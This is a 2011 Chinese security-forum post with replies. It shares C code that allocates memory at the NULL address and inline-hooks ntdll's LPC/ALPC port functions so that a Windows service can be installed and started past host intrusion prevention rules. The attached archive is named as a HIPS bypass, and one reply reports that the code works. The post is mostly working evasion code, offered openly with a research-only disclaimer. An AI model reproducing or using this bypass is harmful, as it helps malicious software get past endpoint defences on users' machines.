[原创]圣诞礼物：妙用0地址~-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]圣诞礼物：妙用0地址~

发表于: 2011-12-23 12:44 25162

[原创]圣诞礼物：妙用0地址~

cvcvxk

2011-12-23 12:44

25162

NULL不是一个无效的参数，但是多少写规则过滤的人，都上来一句if(xxx){}~~
这让人情何以堪啊~直接利用NULL做地址传参的话，就啊哈啊哈~~
上代码，这个方法估计也要被和谐了~

typedef struct _CLIENT_ID {
	HANDLE UniqueProcess;
	HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;
#define LPC_CLIENT_ID CLIENT_ID
#define LPC_SIZE_T SIZE_T
typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle,
	IN OUT PVOID *BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PULONG RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect );
typedef struct _PORT_MESSAGE {
	union {
		struct {
			WORD DataLength;
			WORD TotalLength;
		} s1;
		ULONG Length;
	} u1;
	union {
		struct {
			WORD Type;
			WORD DataInfoOffset;
		} s2;
		ULONG ZeroInit;
	} u2;
	union {
		LPC_CLIENT_ID ClientId;
		double DoNotUseThisField;       // Force quadword alignment
	};
	ULONG MessageId;
	union {
		LPC_SIZE_T ClientViewSize;          // Only valid on LPC_CONNECTION_REQUEST message
		ULONG CallbackId;                   // Only valid on LPC_REQUEST message
	};
	//  UCHAR Data[];
} PORT_MESSAGE, *PPORT_MESSAGE;
typedef NTSTATUS (__stdcall *T_NtRequestWaitReplyPort)(
	 HANDLE PortHandle,
	 PPORT_MESSAGE RequestMessage,
	 PPORT_MESSAGE ReplyMessage
	);
typedef NTSTATUS (__stdcall *T_NtAlpcSendWaitReceivePort)(IN HANDLE PortHandle,
	 DWORD SendFlags,
	 PPORT_MESSAGE SendMessage ,
	 PVOID InMessageBuffer ,
	 PPORT_MESSAGE ReceiveBuffer ,
	 PULONG ReceiveBufferSize ,
	 PVOID OutMessageBuffer ,
	PLARGE_INTEGER Timeout);
T_NtAlpcSendWaitReceivePort OldCallX;
T_NtRequestWaitReplyPort OldCall;
NTSTATUS __stdcall OnNtRequestWaitReplyPort (
	HANDLE PortHandle,
	PPORT_MESSAGE RequestMessage,
	PPORT_MESSAGE ReplyMessage
	)
{
	//设置
	NTSTATUS ns =0;
	_tprintf(_T("hhh \r\n"));
	RtlCopyMemory(NULL,RequestMessage,RequestMessage->u1.s1.TotalLength);
	ns = ((T_NtRequestWaitReplyPort)OldCall)(PortHandle,NULL,ReplyMessage);
	RtlZeroMemory(NULL,0x1000);
	return ns;
}
NTSTATUS __stdcall OnNtAlpcSendWaitReceivePort(IN HANDLE PortHandle,
	DWORD SendFlags,
	PPORT_MESSAGE SendMessage ,
	PVOID InMessageBuffer ,
	PPORT_MESSAGE ReceiveBuffer ,
	PULONG ReceiveBufferSize ,
	PVOID OutMessageBuffer ,
	PLARGE_INTEGER Timeout)
{
	NTSTATUS ns =0;
	_tprintf(_T("hhh2 \r\n"));
	if (SendMessage)
	{
		RtlCopyMemory(NULL,SendMessage,SendMessage->u1.s1.TotalLength);
	}
	ns = ((T_NtAlpcSendWaitReceivePort)OldCallX)(PortHandle,SendFlags,NULL,InMessageBuffer,ReceiveBuffer,ReceiveBufferSize,OutMessageBuffer,Timeout);
	return ns;
}
void InitNullAddress()
{
	PNTALLOCATE NtAllocateVirtualMemory;
	ULONG addr = 2;
	DWORD dwShellSize=0x1000;
	NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtAllocateVirtualMemory");

	if( !NtAllocateVirtualMemory )
	{
		_tprintf(_T("no ntdll api!\r\n"));
		ExitProcess(-1);
	}

	NtAllocateVirtualMemory( (HANDLE)-1,
		(PVOID *)&addr,
		0,
		&dwShellSize,
		MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE );

	_tprintf(_T("Allocate %08x\r\n"),addr);
	if( (ULONG_PTR)addr )
	{
		_tprintf(_T("\r\n[++] Error Allocating memory\r\n"));
		ExitProcess(-1);
	}
}
int _tmain(int argc, _TCHAR* argv[])
{
	T_NtRequestWaitReplyPort Func1;
	T_NtAlpcSendWaitReceivePort Func2;
	//申请出0地址 0x1000 大的块，哦哦哦
	InitNullAddress();
	RtlZeroMemory(NULL,0x1000);
	_tprintf(_T("NULL %08x\r\n"),*(DWORD *)NULL);
	//hook 关键某api
	//XX
	Func1 = (T_NtRequestWaitReplyPort) GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtRequestWaitReplyPort");
	if (Func1)
	{
		InlineHook((void *)Func1,(void *)OnNtRequestWaitReplyPort,(void **)&OldCall);
	}
	Func2 = (T_NtAlpcSendWaitReceivePort)GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtAlpcSendWaitReceivePort");
	if (Func2)
	{
		InlineHook((void *)Func2,(void *)OnNtAlpcSendWaitReceivePort,(void **)&OldCallX);
	}
	//产生那个调用！
	//创建服务代码略
	InstallServiceEx(L"bypass011",L"Test3",L"Test3",L"C:\\1.exe",0x3);
	StartServiceEx(L"bypass011");
	return 0;
}

附件里是完整版代码~
bypasships_NULLAddr.rar

严重声明：本帖给出的代码仅供研究学习之用，如果用在他途，各种后果与本人无关。

欢迎交流，QQ群：171797360

[课程]Linux pwn 探索篇！

上传的附件：

bypasships_NULLAddr.rar （14.04kb，561次下载）

收藏・40

免费・6

支持

最新回复 (50) 1 2 3 ▶
zhouws 雪币： 3107 活跃值： (1249) 能力值： ( LV8，RANK：120 ) 在线值：发帖 11 回帖 360 粉丝 6 关注私信	zhouws 2 2 楼靠，第一个 ~ 2011-12-23 12:48 0
meijingogo 雪币： 65 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 157 粉丝 0 关注私信	meijingogo 3 楼看看是不是第一。哎，居然晚了一步。 2011-12-23 12:48 0
gezz 雪币： 88 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 186 粉丝 0 关注私信	gezz 4 楼老V 过年大爆料啊，继续给力啊 2011-12-23 12:48 0
正happy 雪币： 207 活跃值： (26) 能力值： ( LV4，RANK：50 ) 在线值：发帖 3 回帖 182 粉丝 0 关注私信	正happy 1 5 楼老V啊，，早就等你曝光了 2011-12-23 12:51 0
剑冰风雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 17 粉丝 0 关注私信	剑冰风 6 楼老V , ...... 2011-12-23 12:51 0
goddkiller 雪币： 485 活跃值： (78) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 1 关注私信	goddkiller 7 楼膜拜V大~~学习 2011-12-23 12:52 0
accessd 雪币： 1115 活跃值： (122) 能力值： ( LV7，RANK：100 ) 在线值：发帖 21 回帖 311 粉丝 3 关注私信	accessd 2 8 楼不错的圣诞礼物，顶一下 2011-12-23 12:53 0
MagicFuzzX 雪币： 12 活跃值： (767) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 400 粉丝 1 关注私信	MagicFuzzX 9 楼我朝龙年春节应该比圣诞更给力，支持V校继续 2011-12-23 12:53 0
pigdefeet 雪币： 191 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 13 粉丝 0 关注私信	pigdefeet 10 楼怪不得没见你在群里扯淡忙这个呢 2011-12-23 12:53 0
nevergone 雪币： 63 活跃值： (17) 能力值： ( LV8，RANK：130 ) 在线值：发帖 5 回帖 270 粉丝 0 关注私信	nevergone 3 11 楼学习学习 2011-12-23 12:55 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 12 楼都写好好多时间了~只是一直没找到，昨天恢复硬盘数据终于找到了~ 2011-12-23 12:57 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 13 楼完全不懂，只能膜拜. 2011-12-23 12:59 0
炉子雪币： 66 活跃值： (16) 能力值： ( LV8，RANK：130 ) 在线值：发帖 4 回帖 317 粉丝 1 关注私信	炉子 3 14 楼前排。123456. 2011-12-23 13:00 0
pysafe 雪币： 563 活跃值： (4404) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 110 粉丝 12 关注私信	pysafe 15 楼我擦占楼，很猥琐 2011-12-23 13:01 0
Dstlemoner 雪币： 292 活跃值： (153) 能力值： ( LV3，RANK：30 ) 在线值：发帖 28 回帖 847 粉丝 4 关注私信	Dstlemoner 16 楼完全不懂。。。。能稍稍解释一下么，只是明白能干什么就行了。 2011-12-23 13:02 0
Fido 雪币： 107 活跃值： (326) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 17 楼有点意思啊.............. 2011-12-23 13:06 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 18 楼膜拜V校 2011-12-23 13:11 0
ycmint 雪币： 1149 活跃值： (833) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 19 楼求 v 大收留~~~~真心想学习 2011-12-23 13:39 0
Fypher 雪币： 636 活跃值： (174) 能力值： ( LV9，RANK：260 ) 在线值：发帖 20 回帖 251 粉丝 7 关注私信	Fypher 4 20 楼我来拜 V 神 2011-12-23 13:40 0
xiejienet 雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 639 粉丝 0 关注私信	xiejienet 21 楼好YD的代码啊 2011-12-23 13:48 0
demoscene 雪币： 1981 活跃值： (771) 能力值： ( LV13，RANK：420 ) 在线值：发帖 30 回帖 355 粉丝 27 关注私信	demoscene 7 22 楼测试通过,膜拜 2011-12-23 14:17 0
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 139 关注私信	熊猫正正 9 23 楼嘿嘿~~ 2011-12-23 14:21 0
广海混沌雪币： 220 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 272 粉丝 1 关注私信	广海混沌 24 楼呵呵，不错不错 2011-12-23 14:34 0
ytyay 雪币： 13247 活跃值： (3642) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 129 粉丝 0 关注私信	ytyay 25 楼感谢分享学习学习 2011-12-23 14:45 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

cvcvxk

125

发帖

3095

回帖

760

RANK

关注

私信

他的文章

[分享]很有时间系列：不用inf安装ndis filter驱动 14987

关于我们

联系我们

企业服务

看雪公众号

最新回复 (50) 1 2 3 ▶
zhouws 雪币： 3107 活跃值： (1249) 能力值： ( LV8，RANK：120 ) 在线值：发帖 11 回帖 360 粉丝 6 关注私信	zhouws 2 2 楼靠，第一个 ~ 2011-12-23 12:48 0
meijingogo 雪币： 65 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 157 粉丝 0 关注私信	meijingogo 3 楼看看是不是第一。哎，居然晚了一步。 2011-12-23 12:48 0
gezz 雪币： 88 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 186 粉丝 0 关注私信	gezz 4 楼老V 过年大爆料啊，继续给力啊 2011-12-23 12:48 0
正happy 雪币： 207 活跃值： (26) 能力值： ( LV4，RANK：50 ) 在线值：发帖 3 回帖 182 粉丝 0 关注私信	正happy 1 5 楼老V啊，，早就等你曝光了 2011-12-23 12:51 0
剑冰风雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 17 粉丝 0 关注私信	剑冰风 6 楼老V , ...... 2011-12-23 12:51 0
goddkiller 雪币： 485 活跃值： (78) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 1 关注私信	goddkiller 7 楼膜拜V大~~学习 2011-12-23 12:52 0
accessd 雪币： 1115 活跃值： (122) 能力值： ( LV7，RANK：100 ) 在线值：发帖 21 回帖 311 粉丝 3 关注私信	accessd 2 8 楼不错的圣诞礼物，顶一下 2011-12-23 12:53 0
MagicFuzzX 雪币： 12 活跃值： (767) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 400 粉丝 1 关注私信	MagicFuzzX 9 楼我朝龙年春节应该比圣诞更给力，支持V校继续 2011-12-23 12:53 0
pigdefeet 雪币： 191 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 13 粉丝 0 关注私信	pigdefeet 10 楼怪不得没见你在群里扯淡忙这个呢 2011-12-23 12:53 0
nevergone 雪币： 63 活跃值： (17) 能力值： ( LV8，RANK：130 ) 在线值：发帖 5 回帖 270 粉丝 0 关注私信	nevergone 3 11 楼学习学习 2011-12-23 12:55 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 12 楼都写好好多时间了~只是一直没找到，昨天恢复硬盘数据终于找到了~ 2011-12-23 12:57 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 13 楼完全不懂，只能膜拜. 2011-12-23 12:59 0
炉子雪币： 66 活跃值： (16) 能力值： ( LV8，RANK：130 ) 在线值：发帖 4 回帖 317 粉丝 1 关注私信	炉子 3 14 楼前排。123456. 2011-12-23 13:00 0
pysafe 雪币： 563 活跃值： (4404) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 110 粉丝 12 关注私信	pysafe 15 楼我擦占楼，很猥琐 2011-12-23 13:01 0
Dstlemoner 雪币： 292 活跃值： (153) 能力值： ( LV3，RANK：30 ) 在线值：发帖 28 回帖 847 粉丝 4 关注私信	Dstlemoner 16 楼完全不懂。。。。能稍稍解释一下么，只是明白能干什么就行了。 2011-12-23 13:02 0
Fido 雪币： 107 活跃值： (326) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 17 楼有点意思啊.............. 2011-12-23 13:06 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 18 楼膜拜V校 2011-12-23 13:11 0
ycmint 雪币： 1149 活跃值： (833) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 19 楼求 v 大收留~~~~真心想学习 2011-12-23 13:39 0
Fypher 雪币： 636 活跃值： (174) 能力值： ( LV9，RANK：260 ) 在线值：发帖 20 回帖 251 粉丝 7 关注私信	Fypher 4 20 楼我来拜 V 神 2011-12-23 13:40 0
xiejienet 雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 639 粉丝 0 关注私信	xiejienet 21 楼好YD的代码啊 2011-12-23 13:48 0
demoscene 雪币： 1981 活跃值： (771) 能力值： ( LV13，RANK：420 ) 在线值：发帖 30 回帖 355 粉丝 27 关注私信	demoscene 7 22 楼测试通过,膜拜 2011-12-23 14:17 0
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 139 关注私信	熊猫正正 9 23 楼嘿嘿~~ 2011-12-23 14:21 0
广海混沌雪币： 220 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 272 粉丝 1 关注私信	广海混沌 24 楼呵呵，不错不错 2011-12-23 14:34 0
ytyay 雪币： 13247 活跃值： (3642) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 129 粉丝 0 关注私信	ytyay 25 楼感谢分享学习学习 2011-12-23 14:45 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复